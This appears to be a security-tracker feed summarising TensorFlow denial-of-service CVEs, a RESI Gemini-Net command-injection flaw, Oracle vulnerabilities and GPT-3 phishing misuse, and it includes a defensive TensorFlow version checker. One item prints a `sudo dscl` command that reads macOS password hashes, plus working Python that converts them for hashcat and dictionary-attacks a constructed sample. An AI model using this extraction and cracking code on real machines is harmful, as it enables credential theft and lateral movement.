All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
CVE-2022-29203 is a vulnerability in TensorFlow (an open source platform for machine learning): `tf.raw_ops.SpaceToBatchND` does not fully validate its input arguments, and the computation of the output size can overflow (an integer overflow, where the result exceeds what the integer type can represent and wraps to a wrong value). The wrong size is then used when allocating the output tensor and the process aborts, which an attacker who controls the inputs can trigger as a denial of service.
Fix: Update TensorFlow to the patched release for the branch in use: 2.9.0, 2.8.1, 2.7.2, or 2.6.4, each of which contains a patch for this issue.
TensorFlow (an open source platform for machine learning) versions prior to 2.9.0, 2.8.1, 2.7.2, and 2.6.4 allow an attacker to cause a denial of service (making the system unavailable, here by exhausting available memory) through `tf.ragged.constant`, which does not properly check its input arguments. The root cause is improper input validation: the arguments are used before they are checked against what the function expects.
TensorFlow before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 does not properly check the input arguments to `tf.raw_ops.QuantizedConv2D` (a reduced-precision convolution op used in image processing), so a reference can be bound to nullptr (a null pointer, which points at no valid memory) and dereferenced, crashing the process. Fixed in the listed versions.
TensorFlow before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 has a vulnerability where certain operations fail when given an invalid resource handle (a reference to a stateful resource such as a variable or lookup table). In eager mode (where TensorFlow executes each operation immediately instead of first building a graph) this produces a reference bound to a null pointer, which is undefined behavior and in practice a crash. Graph mode already validated the handle and was not affected.
TensorFlow's `tf.raw_ops.LSTMBlockCell` does not check that its input arguments have the expected shapes. The code then indexes into elements of the mis-shaped inputs and aborts, so an attacker who controls those inputs can crash the process (denial of service).
TensorFlow's `tf.raw_ops.LoadAndRemapMatrix` did not properly validate its input arguments, in particular whether the `initializing_values` parameter was valid. The missing check lets an attacker crash the process (a denial of service, making the service unavailable); it does not give the attacker control of the system.
TensorFlow's `tf.raw_ops.SparseTensorToCSRSparseMatrix` does not validate its inputs before processing them. An attacker can supply data that violates the expected sparse tensor format (a representation that stores only the non-zero entries of a mostly-empty tensor, whose indices, values and shape must agree with each other) and crash the process, a denial of service.
TensorFlow before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 does not validate the input arguments to `tf.raw_ops.UnsortedSegmentJoin`, allowing an attacker to crash the process (denial of service). The code assumes `num_segments` is a scalar (a single value) without checking that it is.
TensorFlow's `tf.raw_ops.Conv3DBackpropFilterV2` (the op that computes the filter gradient of a 3D convolution during training) does not properly check its input arguments before using them, so an attacker who controls the inputs can crash the process (denial of service).
TensorFlow before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 does not check that the `index` input to `tf.raw_ops.StagePeek` is a scalar (a single number); a non-scalar index crashes the process, a denial of service.
TensorFlow's `tf.raw_ops.TensorSummaryV2` did not properly validate its input arguments before using them. An attacker can trigger a CHECK failure (an internal assertion that aborts the process when its condition is violated), a denial of service.
TensorFlow's `tf.raw_ops.DeleteSessionTensor` did not properly check its input arguments before using them, which an attacker can exploit with crafted inputs to crash the process (denial of service).
TensorFlow before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 does not fully validate the input arguments to `tf.raw_ops.QuantizeAndDequantizeV4Grad`; crafted inputs crash the process, a denial of service.
TensorFlow's `tf.raw_ops.GetSessionTensor` (the op that retrieves a tensor previously stored in a session) did not properly validate its input arguments, allowing an attacker to crash the process (denial of service). Fixed in TensorFlow 2.9.0, 2.8.1, 2.7.2, and 2.6.4.
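The fixed versions cited for these TensorFlow items are per-branch backports, so a naive "at least 2.6.4" comparison passes vulnerable builds such as 2.7.1 and 2.8.0. The following Python check is an added example, not code from the advisories or the TensorFlow project; it reads the installed package version from distribution metadata (the distribution names it probes are an assumption about what is in use) and compares it against the first fixed release of the matching branch.

```python
"""Branch-aware check of an installed TensorFlow against the fixed releases
named in the 2022 tf.raw_ops input-validation advisories (added example)."""
import re
from importlib import metadata
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# First fixed release on each maintained branch, as stated in the advisories.
# Branches before 2.6 received no backport, so every release on them is unpatched.
FIXED_BY_BRANCH = {
    (2, 6): (2, 6, 4),
    (2, 7): (2, 7, 2),
    (2, 8): (2, 8, 1),
    (2, 9): (2, 9, 0),
}
NEWEST_FIXED_BRANCH = max(FIXED_BY_BRANCH)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(.*)$")


def parse_version(text: str) -> Tuple[Version, bool]:
    """Return ((major, minor, patch), is_prerelease) for strings such as
    '2.7.2', '2.9.0rc1' or '2.10.0.dev20220501'."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised TensorFlow version: {text!r}")
    major, minor, patch, suffix = m.groups()
    # A suffix beginning rc/a/b/dev/alpha/beta marks a pre-release build.
    prerelease = re.match(r"^[.\-]?(rc|a|b|dev|alpha|beta)\d*", suffix) is not None
    return (int(major), int(minor), int(patch or 0)), prerelease


def is_patched(version: str) -> bool:
    """True when `version` is at or beyond the first fixed release of its own
    branch, or on a branch newer than any the advisories name.

    The branch lookup is the point: 2.7.1 and 2.8.0 compare greater than 2.6.4
    yet still contain the bugs, because each fix was backported per branch.
    Pre-releases on a fixed branch (e.g. 2.9.0rc1) are treated as unpatched,
    since they may predate the fix commit; this is the conservative choice."""
    (major, minor, patch), prerelease = parse_version(version)
    branch = (major, minor)
    if branch > NEWEST_FIXED_BRANCH:
        return True
    if branch not in FIXED_BY_BRANCH or prerelease:
        return False
    return (major, minor, patch) >= FIXED_BY_BRANCH[branch]


def installed_tensorflow_status(
        distributions=("tensorflow", "tensorflow-cpu", "tensorflow-gpu", "tf-nightly")
) -> Optional[str]:
    """Report the first installed TensorFlow distribution found, read from package
    metadata so nothing native is imported. Returns None when none is installed.
    The distribution names are assumed; adjust them to the packaging in use."""
    for name in distributions:
        try:
            version = metadata.version(name)
        except metadata.PackageNotFoundError:
            continue
        state = "patched" if is_patched(version) else "UNPATCHED"
        return f"{name} {version}: {state}"
    return None


if __name__ == "__main__":
    print(installed_tensorflow_status() or "no TensorFlow distribution installed")
```

Run it inside the environment that serves or trains models; a result on a 2.10 or later branch reports patched because those branches were cut after the fixes landed. These `tf.raw_ops` functions are reachable by anything that can hand the process a graph or model, so the exposure is "runs untrusted models" and the remedy is the version, not input filtering in the caller.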
CVE-2022-29539 is a vulnerability in RESI Gemini-Net 4.2: the resi-calltrace component does not validate the parameters it receives before processing them on the server. An unauthenticated attacker can break out of the syntax the software intends (for example by appending shell metacharacters that chain a second command) and inject arbitrary OS commands, which run with the privileges of the application user.
CVE-2022-29538 is a vulnerability in RESI Gemini-Net Web 4.2: improper access control in the authorization logic (the checks that decide who may do what) lets unauthenticated users (callers without valid credentials) reach critical resources that should require a login. No official severity rating had been assigned at the time of the entry.
A vulnerability in the JAXP component (Java API for XML Processing, which parses and transforms XML) of Oracle Java SE and Oracle GraalVM Enterprise Edition (a high-performance Java runtime) allows an unauthenticated attacker with network access to cause a partial denial of service. It affects specific versions of both products and is reachable through deployments that load and run untrusted code, and through web services that pass attacker-supplied data to the vulnerable APIs. CVSS base score 5.3 out of 10 (availability impact).
CVE-2022-21420 is a critical vulnerability in Oracle Coherence (the in-memory data grid in Oracle Fusion Middleware) that allows an unauthenticated attacker with network access over the T3 protocol (Oracle's proprietary RMI transport, also used by WebLogic) to take over the product. Affected versions: 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0. CVSS base score 9.8 out of 10, with high impact on confidentiality, integrity, and availability.
On macOS, an attacker who has obtained root on a machine can read local account password hashes from the local directory service (the node of Open Directory that stores local account records) with the `dscl` command line tool; System Integrity Protection does not block that read. The hashes can then be converted into a format hashcat (a password-cracking tool) accepts and cracked offline. The technique is most dangerous where organizations reuse one local admin password across many Macs: cracking it once yields a credential for lateral movement (using one compromised host to reach others).
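The conversion step, as an added example that is not part of the original post: the `dscl` read returns a binary property list whose `SALTED-SHA512-PBKDF2` entry holds the salt, the iteration count and the PBKDF2-HMAC-SHA512 output. The Python below decodes that hex dump, emits the `$ml$` line that hashcat mode 7100 expects, and re-derives the hash for a candidate password so the format can be checked offline. The account name, password and salt in the sample are constructed, not captured from a real system.

```python
"""Convert a macOS ShadowHashData blob into hashcat mode 7100 format
($ml$<iterations>$<salt>$<entropy>) and check a candidate password against
it offline. Added example; the sample data below is constructed, not captured."""
import hashlib
import plistlib
import re
from typing import Iterable, Optional

# macOS 10.8+ stores SALTED-SHA512-PBKDF2: a 32-byte salt, an iteration count
# and 128 bytes of PBKDF2-HMAC-SHA512 output called "entropy". hashcat -m 7100
# compares only the first 64 bytes of that output.
HASHCAT_ENTROPY_BYTES = 64


def dscl_hex_to_bytes(dscl_output: str) -> bytes:
    """dscl prints the attribute as a hex dump after the attribute name
    (e.g. `dsAttrTypeNative:ShadowHashData:` then ` 62 70 6c 69 ...`); decode it."""
    body = dscl_output.split("ShadowHashData:", 1)[-1]
    return bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", body))


def shadow_hash_to_hashcat(blob: bytes) -> str:
    """Parse the binary plist inside ShadowHashData and emit one mode 7100 line."""
    record = plistlib.loads(blob)["SALTED-SHA512-PBKDF2"]
    iterations = int(record["iterations"])
    salt_hex = bytes(record["salt"]).hex()
    entropy_hex = bytes(record["entropy"])[:HASHCAT_ENTROPY_BYTES].hex()
    return f"$ml${iterations}${salt_hex}${entropy_hex}"


def verify_candidate(hashcat_line: str, candidate: str) -> bool:
    """Redo the work hashcat does for a single guess: derive PBKDF2-HMAC-SHA512
    with the stored salt and iteration count and compare to the stored bytes."""
    _, tag, iterations, salt_hex, entropy_hex = hashcat_line.split("$")
    if tag != "ml":
        raise ValueError("not a hashcat mode 7100 line")
    derived = hashlib.pbkdf2_hmac(
        "sha512", candidate.encode("utf-8"), bytes.fromhex(salt_hex),
        int(iterations), dklen=len(entropy_hex) // 2)
    return derived.hex() == entropy_hex


def make_sample_blob(password: str, salt: bytes, iterations: int) -> bytes:
    """Build a ShadowHashData-shaped binary plist for a known password.
    Constructed test data only: on a real Mac the blob comes from dscl."""
    entropy = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt,
                                  iterations, dklen=128)
    plist = {"SALTED-SHA512-PBKDF2": {
        "entropy": entropy, "salt": salt, "iterations": iterations}}
    return plistlib.dumps(plist, fmt=plistlib.FMT_BINARY)


# Constructed sample shaped like the output of
# `sudo dscl . -read /Users/localadmin dsAttrTypeNative:ShadowHashData`
# for an account whose password is SAMPLE_PASSWORD (hypothetical account).
SAMPLE_PASSWORD = "Summer2022!"
SAMPLE_SALT = bytes(range(32))          # fixed so the output is reproducible
SAMPLE_ITERATIONS = 35460               # realistic order of magnitude for macOS
SAMPLE_DSCL_OUTPUT = "dsAttrTypeNative:ShadowHashData:\n " + " ".join(
    f"{b:02x}" for b in make_sample_blob(SAMPLE_PASSWORD, SAMPLE_SALT, SAMPLE_ITERATIONS))


def crack_sample(wordlist: Iterable[str]) -> Optional[str]:
    """Tiny dictionary attack over the sample: returns the matching word or None."""
    line = shadow_hash_to_hashcat(dscl_hex_to_bytes(SAMPLE_DSCL_OUTPUT))
    return next((w for w in wordlist if verify_candidate(line, w)), None)


if __name__ == "__main__":
    line = shadow_hash_to_hashcat(dscl_hex_to_bytes(SAMPLE_DSCL_OUTPUT))
    print(line)                        # one line of hashes.txt for hashcat -m 7100
    print(crack_sample(["Winter2021!", "Password1", SAMPLE_PASSWORD]))
```

On a real Mac the input comes from `sudo dscl . -read /Users/<name> dsAttrTypeNative:ShadowHashData` (root is required), and the emitted line is what `hashcat -m 7100` consumes. The defensive lesson follows from the same code: the cost per guess is one PBKDF2 run at the stored iteration count, and a password shared across the fleet has to be guessed only once.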
Fix (for each of the TensorFlow issues above): update to the first patched release of the branch in use, 2.9.0, 2.8.1, 2.7.2, or 2.6.4, or a later release on that branch; the advisories state that these versions contain a patch for each issue. A version number higher than 2.6.4 is not by itself a sign of being patched: 2.7.1 and 2.8.0 are newer than 2.6.4 and still vulnerable, because the fixes were backported to each maintained branch separately.
For one of the issues above the source links the patch commit: https://github.com/tensorflow/tensorflow/commit/098e7762d909bac47ce1dbabe6dfd06294cb9d58.
GPT-3 (a large language model that generates fluent, human-like text) can be misused by attackers to write convincing phishing messages (fraudulent messages designed to trick recipients into revealing sensitive information). The post discusses this threat and notes that organizations can take countermeasures, but the excerpt does not detail them.